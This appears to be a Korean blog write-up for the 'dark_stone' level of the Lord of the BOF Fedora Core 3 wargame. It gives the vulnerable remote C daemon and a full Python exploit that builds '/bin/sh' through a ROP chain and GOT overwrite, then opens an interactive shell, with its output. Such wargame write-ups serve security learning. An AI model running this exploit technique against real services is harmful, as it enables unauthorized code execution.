본문 바로가기

Computer Security/WarGame

[BOF원정대/Fedora3] evil_wizard -> dark_stone


/*
        The Lord of the BOF : The Fellowship of the BOF
        - dark_stone
        - Remote BOF on Fedora Core 3
        - hint : GOT overwriting again
        - port : TCP 8888
*/
 
#include <stdio.h>
 
// magic potion for you
void pop_pop_ret(void)
{
        asm("pop %eax");
        asm("pop %eax");
        asm("ret");
}
 
int main()
{
        char buffer[256];
        char saved_sfp[4];
        int length;
        char temp[1024];
 
        printf("dark_stone : how fresh meat you are!\n");
        printf("you : ");
        fflush(stdout);
        // give me a food
        fgets(temp, 1024, stdin);
 
        // for disturbance RET sleding
        length = strlen(temp);
 
        // save sfp
        memcpy(saved_sfp, buffer+264, 4);
 
        // overflow!!
        strcpy(buffer, temp);
 
        // restore sfp
        memcpy(buffer+264, saved_sfp, 4);
 
        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));
 
        // buffer cleaning
        memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);
 
        printf("%s\n", buffer);
}

다른점은 remote 라는것밖에 다른게 없다.

슈퍼데몬이라서 공격방법은 똑같고, 소켓으로 보내는점만 다르다.

이전 단계의 exploit에서 주소들만 수정해주고, 소켓으로 보내면 된다.

import os
import struct
from socket import *
 
def L_E(number):
        return struct.pack('<I',number)
 
PPR = 0x80484f3 # pop-pop-ret
STRCPY = 0x8048438
MEMCPY = 0x8048418
MEMCPY_GOT = 0x8049850
BINSH = 0x8049878
str_c0 = 0x80484c8+8
str_07 = 0x8048178+4
str_75 = 0x80482b4
str_00 = 0x8048138
str_slash = 0x8048114
str_b = 0x8048114+3
str_i = 0x8048114+2
str_n = 0x8048114+10
str_s = 0x8048740+6
str_h = 0x80481b4+4
 
payload = 'A'*268
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(MEMCPY_GOT)
payload += L_E(str_c0)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(MEMCPY_GOT+1)
payload += L_E(str_07)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(MEMCPY_GOT+2)
payload += L_E(str_75)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(MEMCPY_GOT+3)
payload += L_E(str_00)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH)
payload += L_E(str_slash)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+1)
payload += L_E(str_b)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+2)
payload += L_E(str_i)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+3)
payload += L_E(str_n)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+4)
payload += L_E(str_slash)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+5)
payload += L_E(str_s)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+6)
payload += L_E(str_h)
payload += L_E(STRCPY)
payload += L_E(PPR)
payload += L_E(BINSH+7)
payload += L_E(str_00)
payload += L_E(MEMCPY)
payload += "AAAA"
payload += L_E(BINSH)
 
s = socket(AF_INET, SOCK_STREAM)
s.connect(('localhost',8888))
s.send(payload+'\n')
print s.recv(1024)
while True:
        cmd = raw_input('$ ')
        if cmd == 'exit':
                s.close()
                break
        s.send(cmd+'\n')
        result = s.recv(1024)
        print result
s.close()
$ python exploit.py
dark_stone : how fresh meat you are!
you :
$ my-pass
euid = 505
let there be light